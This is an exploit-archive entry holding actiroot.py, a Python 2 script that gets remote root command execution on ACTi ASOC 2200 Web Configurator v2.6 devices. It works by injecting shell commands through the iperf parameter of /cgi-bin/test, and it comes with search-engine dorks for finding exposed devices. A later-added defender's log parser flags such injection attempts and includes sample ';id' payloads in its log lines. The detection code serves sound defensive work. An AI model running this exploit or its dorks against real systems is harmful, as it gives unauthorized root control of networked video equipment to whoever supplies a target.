ACTi ASOC 2200 Web Configurator 2.6 Remote Root Command Execution
Source: b4ltazar@gmail.com  Author: b4ltazar  Published: 2011-03-21
#!/usr/bin/python
# This was written for educational purposes and pentesting only. Use it at your own risk.
# Author will not be responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname        : actiroot.py
# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version         : 
# About           : ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x, fx0, TraXdata, v0da  and all members of ex darkc0de.com, ljuska.org and rev3rse.org
# 
# 
# Example of use  : ./actiroot.py target cmd
# Based on http://packetstormsecurity.org/files/view/99414/actiasoc-exec.txt, so all credits go to original author ...

import sys, os, time, urllib2, re

if sys.platform == 'linux' or sys.platform == 'linux2':
	clearing = 'clear'
else:
	clearing = 'cls'
os.system(clearing)

R = "\033[31m"
G = "\033[32m"

def logo():
	print G+"\n|---------------------------------------------------------------|"
	print "|                                                               |"
	print "| b4ltazar[@]gmail[dot]com                                      |"
	print "|   03/2011     actiroot.py                                     |"
	print "| ACTi Corporation remote root                                  |"
	print "|                                                               |"
	print "|---------------------------------------------------------------|\n"
	print "\n[-] %s\n" % time.strftime("%X")
	
if len(sys.argv) != 3:
	logo()
	print "Usage: ./actiroot.py TARGET CMD"
	sys.exit(0)
	
target = sys.argv[1]
cmd = sys.argv[2]
logo()
exploit = "http://"+target+"/cgi-bin/test?iperf=;"+cmd+" &"
print G+"[+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution"
print "[+] Gd0rk: intitle:Web Configurator - Version v2.6"
print "           inurl:videoconfiguration.cgi"
print "[+] Target: ",target
print "[+] Command: ",cmd
print "[+] Exploit: ", exploit
print "[!] Trying to exploit ..."
print "[+] Please wait ..."

try:
	target = "http://"+target
	root = urllib2.urlopen(target+"/cgi-bin/test?iperf=;"+cmd)
	root = root.read()
	if re.findall("execute", root):
		print "[!] w00t,w00t!!! Exploit works ...\n"
		print R+root
		print G+"\n[!] Exiting ..."
	else:
		print "[-] Sorry, exploit failed !"
		print "\n[!] Exiting ..."
except(KeyboardInterrupt, SystemExit):
	pass
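
Detection sketch for defenders (an added example, not part of b4ltazar's script): the script issues a GET to /cgi-bin/test with a ';' in the iperf parameter, so this flags web or proxy log lines where that parameter carries shell metacharacters. The log lines are constructed, and the combined log format and the benign "-v" value are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Mar/2011:10:00:01 +0000] "GET /cgi-bin/videoconfiguration.cgi HTTP/1.1" 200 5120
192.0.2.10 - - [21/Mar/2011:10:00:05 +0000] "GET /cgi-bin/test?iperf=-v HTTP/1.1" 200 88
198.51.100.7 - - [21/Mar/2011:10:02:13 +0000] "GET /cgi-bin/test?iperf=;id HTTP/1.1" 200 140
198.51.100.7 - - [21/Mar/2011:10:02:20 +0000] "GET /cgi-bin/test?iperf=%3Bid HTTP/1.1" 200 140
198.51.100.7 - - [21/Mar/2011:10:02:31 +0000] "GET /cgi-bin/test?iperf=;uname -a HTTP/1.1" 400 0
"""

# The script sends cmd without URL-encoding, so the logged target can contain
# raw spaces: match lazily up to the protocol token instead of using \S+.
REQUEST = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/\d\.\d"')
# Characters that let a shell start a second command or redirect output.
SHELL_META = re.compile(r"[;|&`$<>\r\n]")

def iperf_value(target):
    """Return the decoded iperf parameter of a /cgi-bin/test request, else None."""
    path, _, query = target.partition("?")
    if unquote_plus(path).rstrip("/") != "/cgi-bin/test":
        return None
    for part in query.split("&"):
        name, sep, value = part.partition("=")
        if sep and unquote_plus(name) == "iperf":
            return unquote_plus(value)
    return None

def find_injection_attempts(log_text):
    """Return (source, decoded iperf value) for requests with shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        value = iperf_value(m.group("target"))
        if value is not None and SHELL_META.search(value):
            hits.append((m.group("src"), value))
    return hits

if __name__ == "__main__":
    for src, value in find_injection_attempts(SAMPLE_LOG):
        print(f"{src} iperf={value!r}")
```

Decoding before matching catches the percent-encoded form as well as the raw one; any hit on an internet-facing unit is reason to treat the device as compromised and to block external access to /cgi-bin/test.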




	


	





 